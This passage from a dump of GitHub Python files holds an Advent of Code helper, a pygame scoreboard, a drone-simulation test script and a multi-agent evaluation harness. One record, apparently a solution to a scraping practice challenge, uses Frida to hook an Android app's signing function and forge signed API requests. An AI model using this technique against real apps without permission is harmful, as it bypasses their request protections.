\"\"\"get total dir size for @param dir_structure\"\"\"\n 
total_dir_size = 0\n        for file_or_dir_name, content in dir_structure.items():\n            assert type(content) == int or type(content) == dict\n            if type(content) == int:\n                total_dir_size += content\n            elif type(content) == dict:\n                total_dir_size += self.get_total_dir_size_of_topmost_dir(content)\n        return total_dir_size\n\n\nif __name__ == '__main__':\n    day7_obj = Day7()\n    day7_obj.main()\n","repo_name":"clara2911/adventOfCode","sub_path":"src/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"29963529186","text":"import pygame.font\r\n\r\n\r\nclass Scoreboard:\r\n    \"\"\"A class to report and record scoring info.\"\"\"\r\n\r\n    def __init__(self, aa_game):\r\n        \"\"\"Initialize scorekeeping attributes.\"\"\"\r\n        self.screen = aa_game.screen\r\n        self.screen_rect = self.screen.get_rect()\r\n        self.settings = aa_game.setting\r\n        self.stats = aa_game.stats\r\n\r\n        #Font settings for scoring information.\r\n        self.text_color = (255, 255, 255)\r\n        self.font = pygame.font.SysFont(None, 48)\r\n        \r\n        #Prepare the initial score image.\r\n        self.prep_score()\r\n\r\n    def load_HS(self):\r\n        \"\"\"Retrieve the saved high score.\"\"\"\r\n        with open(\"C:/Users/coole/Python Code/Space_Invaders/game_assests/data/game_data.txt\", 'r') as HS_data:\r\n            old_hs = HS_data.read()\r\n        return float(old_hs) \r\n\r\n    def save_HS(self):\r\n        if self.highscore <= self.stats.score:\r\n            self.highscore = self.stats.score\r\n            # the with-block closes the file on exit, so no explicit close() is needed\r\n            with open('C:/Users/coole/Python Code/Space_Invaders/game_assests/data/game_data.txt', 'w') as hs_data:\r\n                hs_data.write(str(self.highscore))\r\n\r\n    def prep_score(self):\r\n        \"\"\"Turn the score into a rendered image.\"\"\"\r\n        round = self.stats.round\r\n        round_str = \"round: {}\".format(round)\r\n        self.round_image = self.font.render(round_str, True,\r\n                self.text_color, self.settings.bgColor)\r\n\r\n        self.highscore = self.load_HS()\r\n        self.rounded_HS = int(self.highscore)\r\n        self.HS_str = \"Highscore: {:,}\".format(self.rounded_HS)\r\n        self.HS_image = self.font.render(self.HS_str, True,\r\n                self.text_color, self.settings.bgColor)\r\n\r\n        self.rounded_score = self.stats.score\r\n        self.score_str = \"Score: {:,}\".format(self.rounded_score)\r\n        self.score_image = self.font.render(self.score_str, True,\r\n                self.text_color, self.settings.bgColor)\r\n\r\n        #Display the score at the top right of the screen.\r\n        self.round_rect = self.round_image.get_rect()\r\n        self.round_rect.right = self.round_rect.right + 300\r\n        self.round_rect.top = 20\r\n\r\n        self.HS_rect = self.HS_image.get_rect()\r\n        self.HS_rect.right = self.HS_rect.right + 600\r\n        self.HS_rect.top = 20\r\n\r\n        self.score_rect = self.score_image.get_rect()\r\n        self.score_rect.right = self.score_rect.right + 20\r\n        self.score_rect.top = 20\r\n        self.save_HS()\r\n\r\n    def show_score(self):\r\n        \"\"\"Draw score to the screen.\"\"\"\r\n        self.screen.blit(self.score_image, self.score_rect)\r\n        self.screen.blit(self.HS_image, self.HS_rect)\r\n        self.screen.blit(self.round_image, self.round_rect)","repo_name":"dcee-py/Alien_Assault","sub_path":"Space_Invaders/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"39395287882","text":"\"\"\"\nYuanrenxue app, challenge 3\nThe values passed into this function are: 0141661318660000 1661318659000\nThe function call returns 
6f62132a5db2b97f1209cc3d5b638a837253c7bd706313e424cd07692f7073d2\n\n5127426\n\"\"\"\nimport time\nimport frida\nimport requests\nfrom loguru import logger\n\n\ndef my_message_handler(message, payload):\n    logger.info(f\"message=>{message}\")\n    logger.info(f\"payload=>{payload}\")\n\n\n# Connect to the device over USB\ndevice = frida.get_usb_device(10)\nlogger.info(f'device=>{device}')\n\nsession = device.attach(\"猿人学2022\")\nlogger.info(f'session=>{session}')\n\n# # load script\nwith open(\"../js/three_rpc.js\", encoding=\"utf-8\") as f:\n    script = session.create_script(f.read())\nscript.on(\"message\", my_message_handler)\nscript.load()\n\n# Test case for challenge 3\n# res = script.exports.invoke_sign_three(\"0141661318660000\", 1661318659000)\n# print(res)\n\n\ndef get_url():\n    headers = {\n        'Host': 'appmatch.yuanrenxue.com',\n        'accept-language': 'zh-CN,zh;q=0.8',\n        'user-agent': 'Mozilla/5.0 (Linux; U; Android 11; zh-cn; M2010J19SC Build/RKQ1.201004.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1',\n        'content-type': 'application/x-www-form-urlencoded; charset=utf-8',\n        'cache-control': 'no-cache',\n    }\n    total = 0\n    for page in range(1, 101):\n        logger.info(f\"Requesting page {page}\")\n        ctime = int(time.time() * 1000)\n        cstr = f\"{page}{ctime}\".zfill(16)\n        sign = script.exports.invoke_sign_three(cstr, ctime)\n        data = {\n            'page': page,\n            'm': sign\n        }\n        response = requests.post('https://appmatch.yuanrenxue.com/app3', headers=headers, data=data)\n        data_list = response.json().get(\"data\")\n        for one in data_list:\n            val = one.get(\"value\").strip()\n            total += int(val)\n        logger.info(f\"total:{total}\")\n\n\nif __name__ == '__main__':\n    get_url()","repo_name":"ppwang06/app_yuanrenxue","sub_path":"cal_result/three_rpc.py","file_name":"three_rpc.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"7161211644","text":"import os\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport argparse\nimport time\nimport shutil\n\nfrom dda.simulation import FlightmareSimulation\nfrom dda.learner import ControllerLearning\nfrom dda.config.settings import create_settings\n\nfrom gazesim.models.utils import image_softmax\n\n\ndef save_trajectory_data(time_stamps, output_file, mpc_actions, network_actions,\n                         states, network_used, save_path, extra_info=None):\n    data = {\n        \"time-since-start [s]\": time_stamps,\n        \"throttle_mpc\": mpc_actions[:, 0],\n        \"roll_mpc\": mpc_actions[:, 1],\n        \"pitch_mpc\": mpc_actions[:, 2],\n        \"yaw_mpc\": mpc_actions[:, 3],\n        \"throttle_nw\": network_actions[:, 0],\n        \"roll_nw\": network_actions[:, 1],\n        \"pitch_nw\": network_actions[:, 2],\n        \"yaw_nw\": network_actions[:, 3],\n        \"position_x [m]\": states[:, 0],\n        \"position_y [m]\": states[:, 1],\n        \"position_z [m]\": states[:, 2],\n        \"rotation_w [quaternion]\": states[:, 3],\n        \"rotation_x [quaternion]\": states[:, 4],\n        \"rotation_y [quaternion]\": states[:, 5],\n        \"rotation_z [quaternion]\": states[:, 6],\n        \"velocity_x [m/s]\": states[:, 7],\n        \"velocity_y [m/s]\": states[:, 8],\n        \"velocity_z [m/s]\": states[:, 9],\n        \"omega_x [rad/s]\": states[:, 10],\n        \"omega_y [rad/s]\": states[:, 11],\n        \"omega_z [rad/s]\": states[:, 12],\n        \"network_used\": np.array(network_used).astype(int)\n    }\n    if extra_info is not None:\n        data.update(extra_info)\n    data = pd.DataFrame(data)\n    data.to_csv(os.path.join(save_path, \"{}.csv\".format(output_file)), index=False)\n\n\ndef find_paths(model_load_path, trajectory_path):\n    # it is assumed that the file structure is 
the same as that which DDA creates\n\n # expand vars in the paths, so that the same file can be used on multiple machines with the same file structure\n new_mlp = []\n for mlp in model_load_path:\n new_mlp.append(os.path.expandvars(mlp))\n model_load_path = new_mlp\n\n # root directory (to save everything in as well)\n root_dirs = []\n for mlp in model_load_path:\n # take care of getting the right files outside of this if dirs are specified\n root_dirs.append(os.path.abspath(os.path.join(mlp, os.pardir, os.pardir)))\n # root_dir = os.path.abspath(os.path.join(model_load_path, os.pardir, os.pardir))\n\n # get the actual files to load from\n model_load_path_no_ext = []\n for mlp in model_load_path:\n model_load_path_no_ext.append(os.path.splitext(mlp)[0])\n # model_load_path_no_ext = os.path.splitext(model_load_path)[0]\n\n # settings file\n settings_files = []\n for rd in root_dirs:\n for file in os.listdir(rd):\n if file.endswith(\".yaml\"):\n settings_files.append(os.path.join(rd, file))\n break\n # settings_file = None\n # for file in os.listdir(root_dir):\n # if file.endswith(\".yaml\"):\n # settings_file = os.path.join(root_dir, file)\n # break\n\n # save dir for the test trajectories\n save_dirs = []\n for rd, sf in zip(root_dirs, settings_files):\n model_name = os.path.basename(sf)\n model_name = model_name.split(\".\")[0].replace(\"snaga_\", \"\")\n save_dirs.append(os.path.join(rd, f\"dda_{model_name}\"))\n # model_name = os.path.basename(settings_file)\n # model_name = model_name.split(\".\")[0].replace(\"snaga_\", \"\")\n # save_dir = os.path.join(root_dir, f\"dda_{model_name}\")\n\n # figure out whether it is a single trajectory or multiple\n trajectory_paths = []\n if os.path.isfile(trajectory_path) and trajectory_path.endswith(\".csv\"):\n trajectory_paths.append(os.path.abspath(trajectory_path))\n elif os.path.isdir(trajectory_path):\n for file in os.listdir(trajectory_path):\n if file.startswith(\"trajectory\") and file.endswith(\".csv\"):\n trajectory_paths.append(os.path.abspath(os.path.join(trajectory_path, file)))\n else:\n raise FileNotFoundError(\"Path '{}' is not a valid trajectory file or folder\".format(trajectory_path))\n\n return root_dirs, model_load_path_no_ext, settings_files, save_dirs, trajectory_paths\n\n\ndef main(args):\n root_dirs, model_load_paths_no_ext, settings_files, save_dirs, trajectory_paths = find_paths(\n args.model_load_path, args.trajectory_path)\n\n \"\"\"\n from pprint import pprint\n pprint(root_dirs)\n print()\n pprint(model_load_paths_no_ext)\n print()\n pprint(settings_files)\n print()\n pprint(save_dirs)\n\n root_dirs = root_dirs[:2]\n model_load_paths_no_ext = model_load_paths_no_ext[:2]\n settings_files = settings_files[:2]\n save_dirs = save_dirs[:2]\n \"\"\"\n\n # want to keep the same simulation instance if this is to be used on snaga\n # (where disconnecting from the Unity application leads to an error), therefore\n # use it for all models/trajectories (the timeout should be set accordingly)\n simulation = None\n\n print(settings_files)\n\n # TODO: also record\n # - gaze prediction + 3D vector\n # - drone velocity is already recorded I guess\n # - maybe current reference though? 
for plotting the reference trajectory?\n # - current high-level-label\n\n # loop over all models\n experiments_total = len(root_dirs) * len(trajectory_paths) * args.repetitions\n experiments_counter = 0\n for root_dir, model_load_path_no_ext, settings_file, save_dir in zip(\n root_dirs, model_load_paths_no_ext, settings_files, save_dirs):\n model_start = time.time()\n print(\"\\n[Testing] Starting testing for '{}'\\n\".format(root_dir))\n\n # create the directory to save the outputs in if it doesn't exist already\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n # copy the settings file to the save directory\n shutil.copy(settings_file, save_dir)\n\n # create and modify settings\n settings = create_settings(settings_file, mode=\"dagger\", generate_log=False)\n settings.resume_training = True\n settings.resume_ckpt_file = model_load_path_no_ext\n settings.gpu = args.gpu\n settings.flightmare_pub_port = args.pub_port\n settings.flightmare_sub_port = args.sub_port\n settings.max_time = 1000.0\n if args.offline_evaluation:\n settings.start_buffer = 1000.0\n if args.record_extra_info:\n settings.return_extra_info = True\n\n # using \"learner\" as controller\n controller = ControllerLearning(settings, trajectory_paths[0], mode=\"testing\", max_time=settings.max_time)\n\n if simulation is None:\n # create simulation (do it here so we don't disconnect and mess things up on snaga)\n simulation = FlightmareSimulation(settings, trajectory_paths[0], max_time=settings.max_time)\n\n # connect to the simulation either at the start or after training has been run\n simulation.connect_unity(settings.flightmare_pub_port, settings.flightmare_sub_port)\n\n # wait until Unity rendering/image queue has calmed down\n for _ in range(50):\n simulation.flightmare_wrapper.get_image()\n time.sleep(0.1)\n else:\n # hopefully this works as intended, in principle nothing should change for all models we are testing for\n # but if this is changed later, that might not be the case (similar to the track type being set)\n simulation.update_config(settings)\n\n # test for each specified trajectory:\n for trajectory_path in trajectory_paths:\n trajectory_start = time.time()\n print(\"\\n[Testing] Starting testing for '{}'\\n\".format(trajectory_path))\n\n # determine the directory to save the output in\n trajectory_name = os.path.basename(trajectory_path)\n trajectory_name = trajectory_name.split(\".\")[0]\n trajectory_dir = os.path.join(save_dir, trajectory_name)\n if not os.path.exists(trajectory_dir):\n os.makedirs(trajectory_dir)\n\n # copy the original trajectory file to that folder for reference\n shutil.copyfile(trajectory_path, os.path.join(trajectory_dir, \"original.csv\"))\n\n # update the simulation and learner, which contain trajectory samplers/planners\n simulation.update_trajectory(trajectory_path, max_time=settings.max_time)\n controller.update_trajectory(trajectory_path, max_time=settings.max_time)\n\n # repeatedly fly the current trajectory\n for repetition in range(args.repetitions):\n experiments_counter += 1\n repetition_start = time.time()\n print(\"\\n[Testing] Starting repetition {} ({}/{})\\n\".format(\n repetition, experiments_counter, experiments_total))\n\n # file name(s)\n if args.output_file is not None:\n output_file = \"{}_{:02d}\".format(args.output_file, repetition)\n else:\n if args.offline_evaluation:\n output_file = \"mpc_nw_act_{:02d}\".format(repetition)\n else:\n output_file = \"mpc2nw_mt-{:02d}_st-{:02d}_{:02d}\".format(\n int(simulation.total_time * 10), 
int(settings.start_buffer * 10), repetition)\n\n writer = None\n if args.save_video:\n writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.base_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n fts_writer = None\n if args.save_feature_track_video:\n fts_writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"fts_{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.image_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n att_writer = None\n if args.save_attention_video:\n att_writer = cv2.VideoWriter(\n os.path.join(trajectory_dir, \"att_{}.mp4\".format(output_file)),\n cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\"),\n settings.base_frequency,\n (simulation.flightmare_wrapper.image_width, simulation.flightmare_wrapper.image_height),\n True,\n )\n\n all_features = {}\n colors = np.random.randint(0, 255, (controller.feature_tracker.max_features_to_track, 3))\n\n # data to record\n time_stamps = []\n states = []\n mpc_actions = []\n network_actions = []\n network_used = []\n extra_info = None\n if args.record_extra_info:\n extra_info = []\n\n # whether to use the network instead of the MPC\n use_network = False\n\n # resetting everything\n trajectory_done = False\n info_dict = simulation.reset()\n controller.reset()\n controller.use_network = use_network\n controller.record_data = False\n controller.update_info(info_dict)\n controller.prepare_network_command()\n controller.prepare_expert_command()\n action = controller.get_control_command()\n\n # run the main loop until the simulation \"signals\" that the trajectory is done\n while not trajectory_done:\n # decide whether to switch to network at the current time\n if info_dict[\"time\"] > settings.start_buffer:\n use_network = True\n controller.use_network = use_network\n\n # print(info_dict[\"reference\"][:3])\n\n # record states\n time_stamps.append(info_dict[\"time\"])\n states.append(info_dict[\"state\"])\n\n # record actions\n mpc_actions.append(action[\"expert\"] if not use_network or args.record_mpc_actions\n else np.array([np.nan] * 4))\n network_actions.append(action[\"network\"])\n network_used.append(action[\"use_network\"])\n\n if info_dict[\"update\"][\"image\"] and args.save_feature_track_video:\n current_image = info_dict[\"image\"].copy()\n mask = np.zeros_like(current_image)\n current_features = controller.feature_tracks\n\n # for f_idx, f in enumerate(current_features):\n for f_id, feat in current_features.items():\n point = tuple(((feat[0:2] + 1) / 2 * np.array([800.0, 600.0])).astype(int))\n if f_id not in all_features:\n all_features[f_id] = [point]\n else:\n all_features[f_id].append(point)\n\n # TODO: only iterate over the stuff that's in the current dict\n # for f_idx, f in enumerate(current_features):\n color_idx = 0\n for f_id, feat in current_features.items():\n points = all_features[f_id]\n for i in range(len(points) - 1):\n mask = cv2.line(mask, (points[i][0], points[i][1]),\n (points[i + 1][0], points[i + 1][1]),\n colors[color_idx].tolist(), 2)\n current_image = cv2.circle(\n current_image, (points[-1][0], points[-1][1]), 5, colors[color_idx].tolist(), -1)\n color_idx += 1\n\n # pprint(controller.feature_tracks)\n # print()\n current_image = cv2.add(current_image, mask)\n # cv2.imshow(\"frame\", current_image)\n # cv2.waitKey(0)\n 
fts_writer.write(current_image)\n\n if args.record_extra_info:\n extra_info.append(controller.extra_info.copy())\n\n if args.save_video:\n writer.write(info_dict[\"image\"])\n\n if args.save_attention_video:\n att = controller.extra_info[\"out_attention\"]\n att = image_softmax(att)\n att = att.cpu().detach().numpy().squeeze()\n if att.max() != 0:\n att /= att.max()\n att = (att * 255).astype(\"uint8\")\n att = np.repeat(att[np.newaxis, :, :], 3, axis=0).transpose((1, 2, 0))\n att[:, :, :-1] = 0\n att = cv2.resize(att, (800, 600))\n att = cv2.addWeighted(info_dict[\"image\"], 1.0, att, 1.0, 0)\n att_writer.write(att)\n\n # perform the step(s) in the simulation and get the new action\n info_dict = simulation.step(action[\"network\"] if action[\"use_network\"] else action[\"expert\"])\n if use_network and not args.record_mpc_actions:\n info_dict[\"update\"][\"expert\"] = False\n\n trajectory_done = info_dict[\"done\"]\n if not trajectory_done:\n controller.update_info(info_dict)\n if not settings.save_at_net_frequency or info_dict[\"update\"][\"command\"]:\n action = controller.get_control_command()\n\n # prepare data\n states = np.vstack(states)\n mpc_actions = np.vstack(mpc_actions)\n network_actions = np.vstack(network_actions)\n\n if args.record_extra_info:\n extra_info = {k: [d[k] for d in extra_info] for k in extra_info[0]}\n\n if args.save_video:\n writer.release()\n\n if args.save_feature_track_video:\n fts_writer.release()\n\n if args.save_attention_video:\n att_writer.release()\n\n # save the data\n # trajectory_dir = \"/home/simon/Desktop/weekly_meeting/meeting21/debug_weird_nw_pred\"\n save_trajectory_data(time_stamps, output_file, mpc_actions, network_actions,\n states, network_used, trajectory_dir, extra_info)\n\n print(\"\\n[Testing] Finished repetition {} in {:.2f}s ({}/{})\\n\".format(\n repetition, time.time() - repetition_start, experiments_counter, experiments_total))\n\n print(\"\\n[Testing] Finished testing for '{}' in {:.2f}s\\n\".format(\n trajectory_path, time.time() - trajectory_start))\n\n print(\"\\n[Testing] Finished testing for '{}' in {:.2f}s\\n\".format(root_dir, time.time() - model_start))\n\n if simulation is not None:\n simulation.disconnect_unity()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Test Network\", fromfile_prefix_chars=\"@\")\n parser.add_argument(\"-mlp\", \"--model_load_path\", type=str, nargs=\"+\", required=True,\n help=\"Path(s) to model checkpoint. Can be listed in a plain text file and \"\n \"read from the file by specifying '@filename' for this argument.\")\n parser.add_argument(\"-tp\", \"--trajectory_path\", type=str, required=True, help=\"Path to trajectory/trajectories\")\n parser.add_argument(\"-of\", \"--output_file\", type=str, help=\"Output file name other than default trajectory\")\n parser.add_argument(\"-rep\", \"--repetitions\", type=int, default=20, help=\"Repetitions for testing\")\n parser.add_argument(\"-pp\", \"--pub_port\", type=int, default=10253, help=\"Flightmare publisher port\")\n parser.add_argument(\"-sp\", \"--sub_port\", type=int, default=10254, help=\"Flightmare subscriber port\")\n parser.add_argument(\"-g\", \"--gpu\", type=int, default=0, help=\"GPU to run networks on\")\n parser.add_argument(\"-rma\", \"--record_mpc_actions\", action=\"store_true\", help=\"Whether or not to do this\")\n parser.add_argument(\"-off\", \"--offline_evaluation\", action=\"store_true\",\n help=\"Whether or not to evaluate the trained model 'offline', i.e. 
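The attention-video branch above squashes the network's attention map with a softmax, rescales it to [0, 255], paints it into a single BGR channel, resizes it to the frame, and blends with cv2.addWeighted. A standalone sketch of the same steps; image_softmax is a utility from this repo, so a plain whole-map softmax stands in for it here, and the attention values are random:

import cv2
import numpy as np

frame = np.zeros((600, 800, 3), dtype=np.uint8)   # stand-in camera frame
att = np.random.rand(12, 16)                      # stand-in attention logits
att = np.exp(att) / np.exp(att).sum()             # softmax over the whole map
if att.max() != 0:
    att /= att.max()                              # rescale to [0, 1]
att = (att * 255).astype("uint8")
att = np.repeat(att[np.newaxis, :, :], 3, axis=0).transpose((1, 2, 0))
att[:, :, :-1] = 0                                # keep only the last (red) channel
att = cv2.resize(att, (800, 600))                 # match the frame size
overlay = cv2.addWeighted(frame, 1.0, att, 1.0, 0)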
using the MPC to \"\n \"fly the trajectory, but evaluating the model is done during training and \"\n \"recording its actions.\")\n parser.add_argument(\"-xi\", \"--record_extra_info\", action=\"store_true\",\n help=\"Whether or not to record extra info, e.g. from attention branching (only one \"\n \"implemented right now) or feature tracks or IMU.\")\n parser.add_argument(\"-sv\", \"--save_video\", action=\"store_true\",\n help=\"Whether or not to save the frames as a video.\")\n parser.add_argument(\"-sftv\", \"--save_feature_track_video\", action=\"store_true\",\n help=\"Whether or not to save the frames with feature tracks as a video.\")\n parser.add_argument(\"-sav\", \"--save_attention_video\", action=\"store_true\",\n help=\"Whether or not to save the frames attention predictions overlaid as a video. \"\n \"Note that this option was only used temporarily to create some visualisations and \"\n \"for it to work some of the rest of the code was changed as well. The latter changes \"\n \"have now been reversed, thus this will not actually work.\")\n\n main(parser.parse_args())\n","repo_name":"uzh-rpg/VAPAR","sub_path":"flightmare/flightil/dda/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":20355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"22106727900","text":"import argparse\nimport os\nimport json\nimport gym\nimport time\nimport pickle\nimport logging\nimport sys\n\n# add this dictionary to python env path:\nbase_path = os.getcwd()\nsys.path.append(base_path)\n\nfrom h_agent import H_agent\nfrom lm_agent import lm_agent\n\ngym.envs.registration.register(\n id='transport_challenge_MA',\n entry_point='tdw_gym:TDW'\n)\n\nclass Challenge:\n def __init__(self, logger, port, data_path, output_dir, number_of_agents = 2, max_frames = 3000, launch_build = True, screen_size = 512, data_prefix = 'dataset/nips_dataset/', gt_mask = True, save_img = True):\n self.env = gym.make(\"transport_challenge_MA\", port = port, number_of_agents = number_of_agents, save_dir = output_dir, max_frames = max_frames, launch_build = launch_build, screen_size = screen_size, data_prefix = data_prefix, gt_mask = gt_mask)\n self.gt_mask = gt_mask\n self.logger = logger\n self.logger.debug(port)\n self.logger.info(\"Environment Created\")\n self.output_dir = output_dir\n self.max_frames = max_frames\n self.save_img = save_img\n self.data = json.load(open(os.path.join(data_prefix, data_path), \"r\"))\n self.logger.info(\"done\")\n\n def submit(self, agents, logger, eval_episodes):\n total_finish = 0.0\n if eval_episodes[0] == -1:\n eval_episodes = range(len(self.data))\n num_eval_episodes = len(eval_episodes)\n\n start = time.time()\n results = {}\n for i, episode in enumerate(eval_episodes):\n start_time = time.time()\n if os.path.exists(os.path.join(self.output_dir, str(episode), 'result_episode.json')):\n with open(os.path.join(self.output_dir, str(episode), 'result_episode.json'), 'r') as f:\n result = json.load(f)\n total_finish += result['finish'] / result['total']\n results[episode] = result\n continue\n # The episode has been evaluated before\n\n if not os.path.exists(os.path.join(self.output_dir, str(episode))):\n os.makedirs(os.path.join(self.output_dir, str(episode)))\n self.logger.info('Episode {} ({}/{})'.format(episode, i + 1, num_eval_episodes))\n self.logger.info(f\"Resetting Environment ... 
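The --model_load_path help text above mentions '@filename'; that works because the parser is constructed with fromfile_prefix_chars="@", which makes argparse read the named file and expand each of its lines into one command-line token. A minimal demo reusing the same flag:

import argparse

parser = argparse.ArgumentParser(fromfile_prefix_chars="@")
parser.add_argument("-mlp", "--model_load_path", type=str, nargs="+", required=True)

args = parser.parse_args(["-mlp", "a.pt", "b.pt"])
assert args.model_load_path == ["a.pt", "b.pt"]

# With a file models.txt containing "-mlp" on its first line and one
# checkpoint path per following line, this call is equivalent:
#     args = parser.parse_args(["@models.txt"])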
data is {self.data[episode]}\")\n state, info, env_api = self.env.reset(seed=self.data[episode]['seed'], options=self.data[episode], output_dir = os.path.join(self.output_dir, str(episode)))\n for id, agent in enumerate(agents):\n if type(env_api) == list:\n curr_api = env_api[id]\n else: curr_api = env_api\n if info['goal_description'] is not None:\n if agent.agent_type == 'h_agent':\n agent.reset(goal_objects = info['goal_description'], output_dir = os.path.join(self.output_dir, str(episode)), env_api = curr_api, agent_color = info['agent_colors'][id], agent_id = id, gt_mask = self.gt_mask, save_img = self.save_img)\n elif agent.agent_type == 'lm_agent':\n agent.reset(obs = state[str(id)], goal_objects = info['goal_description'], output_dir = os.path.join(self.output_dir, str(episode)), env_api = curr_api, agent_color = info['agent_colors'][id], agent_id = id, rooms_name=info['rooms_name'], gt_mask = self.gt_mask, save_img = self.save_img)\n else:\n raise Exception(f\"{agent.agent_type} not available\")\n else:\n agent.reset(output_dir = os.path.join(self.output_dir, str(episode)))\n self.logger.info(f\"Environment Reset. Took {time.time() - start_time} secs\")\n local_finish = self.env.check_goal()\n done = False\n step_num = 0\n local_reward = 0.0\n while not done:\n step_num += 1\n actions = {}\n if self.save_img: self.env.save_images(os.path.join(self.output_dir, str(episode), 'Images'))\n for agent_id, agent in enumerate(agents):\n actions[str(agent_id)] = agent.act(state[str(agent_id)])\n state, reward, done, info = self.env.step(actions)\n local_reward += reward\n local_finish = self.env.check_goal()\n self.logger.info(f\"Executing step {step_num} for episode: {episode}, actions: {actions}, finish: {local_finish}, frame: {self.env.num_frames}\")\n if done:\n break\n total_finish += local_finish[0] / local_finish[1]\n result = {\n \"finish\": local_finish[0],\n \"total\": local_finish[1],\n }\n with open(os.path.join(self.output_dir, str(episode), 'result_episode.json'), 'w') as f:\n json.dump(result, f)\n results[episode] = result\n avg_finish = total_finish / num_eval_episodes\n results = {\n \"episode_results\": results,\n \"avg_finish\": avg_finish\n }\n with open(os.path.join(self.output_dir, 'eval_result.json'), 'w') as f:\n json.dump(results, f, indent=4)\n self.logger.info(f'eval done, avg transport rate {avg_finish}')\n self.logger.info('time: {}'.format(time.time() - start))\n return avg_finish\n\n def close(self):\n self.env.close()\n\ndef init_logs(output_dir, name = 'simple_example'):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler(os.path.join(output_dir, \"output.log\"))\n fh.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(ch)\n return logger\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--output_dir\", type=str, default=\"results\")\n parser.add_argument(\"--experiment_name\", type = str, default = \"try\")\n parser.add_argument(\"--run_id\", type=str, default='run_0')\n parser.add_argument(\"--data_path\", type=str, default=\"test_env.json\")\n parser.add_argument(\"--data_prefix\", type=str, default=\"dataset/dataset_train/\")\n parser.add_argument(\"--port\", default=1071, type=int)\n parser.add_argument(\"--agents\", nargs='+', type=str, 
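Challenge.submit above drives every agent through the same contract: an agent_type tag that selects which reset() signature to call, then one act(obs) call per environment step. A hypothetical minimal agent satisfying that contract, inferred only from the calls visible in this record (the constructor arguments mirror how H_agent is built below; the action value is a placeholder, not the repo's real action format):

class NoopAgent:
    agent_type = 'h_agent'            # submit() dispatches reset() on this tag

    def __init__(self, agent_id, logger, max_frames, output_dir):
        self.agent_id = agent_id
        self.logger = logger
        self.max_frames = max_frames
        self.output_dir = output_dir

    def reset(self, **kwargs):
        # absorbs goal_objects, env_api, agent_color, gt_mask, save_img, ...
        self.steps = 0

    def act(self, obs):
        self.steps += 1
        return None                   # placeholder "do nothing" action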
default=(\"h_agent\",))\n parser.add_argument(\"--eval_episodes\", nargs='+', default=(-1,), type=int, help=\"which episodes to evaluate on\")\n parser.add_argument(\"--max_frames\", default=3000, type=int, help=\"max frames per episode\")\n parser.add_argument(\"--no_launch_build\", action='store_true')\n parser.add_argument(\"--communication\", action='store_true')\n parser.add_argument(\"--debug\", action='store_true')\n parser.add_argument(\"--no_gt_mask\", action='store_true')\n # LLM parameters\n parser.add_argument('--source', default='openai',\n choices=['hf', 'openai'],\n help='openai API or load huggingface models')\n parser.add_argument('--lm_id', default='gpt-3.5-turbo',\n help='name for openai engine or huggingface model name/path')\n parser.add_argument('--prompt_template_path', default='LLM/prompt_single.csv',\n help='path to prompt template file')\n parser.add_argument(\"--t\", default=0.7, type=float)\n parser.add_argument(\"--top_p\", default=1.0, type=float)\n parser.add_argument(\"--max_tokens\", default=64, type=int)\n parser.add_argument(\"--n\", default=1, type=int)\n parser.add_argument(\"--logprobs\", default=1, type=int)\n parser.add_argument(\"--cot\", action='store_true', help=\"use chain-of-thought prompt\")\n parser.add_argument(\"--echo\", action='store_true', help=\"to include prompt in the outputs\")\n parser.add_argument(\"--screen_size\", default=512, type=int)\n parser.add_argument(\"--no_save_img\", action='store_true', help=\"do not save images\", default=False)\n args = parser.parse_args()\n\n args.number_of_agents = len(args.agents)\n os.makedirs(args.output_dir, exist_ok = True)\n args.output_dir = os.path.join(args.output_dir, args.experiment_name)\n os.makedirs(args.output_dir, exist_ok = True)\n args.output_dir = os.path.join(args.output_dir, args.run_id)\n os.makedirs(args.output_dir, exist_ok = True)\n logger = init_logs(args.output_dir)\n\n challenge = Challenge(logger, args.port, args.data_path, args.output_dir, args.number_of_agents, args.max_frames, not args.no_launch_build, screen_size = args.screen_size, data_prefix=args.data_prefix, gt_mask = not args.no_gt_mask, save_img = not args.no_save_img)\n agents = []\n for i, agent in enumerate(args.agents):\n if agent == 'h_agent':\n agents.append(H_agent(i, logger, args.max_frames, args.output_dir))\n elif agent == 'lm_agent':\n agents.append(lm_agent(i, logger, args.max_frames, args, args.output_dir))\n else:\n pass\n try:\n challenge.submit(agents, logger, args.eval_episodes)\n finally:\n challenge.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"UMass-Foundation-Model/Co-LLM-Agents","sub_path":"tdw_mat/tdw-gym/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"48"} 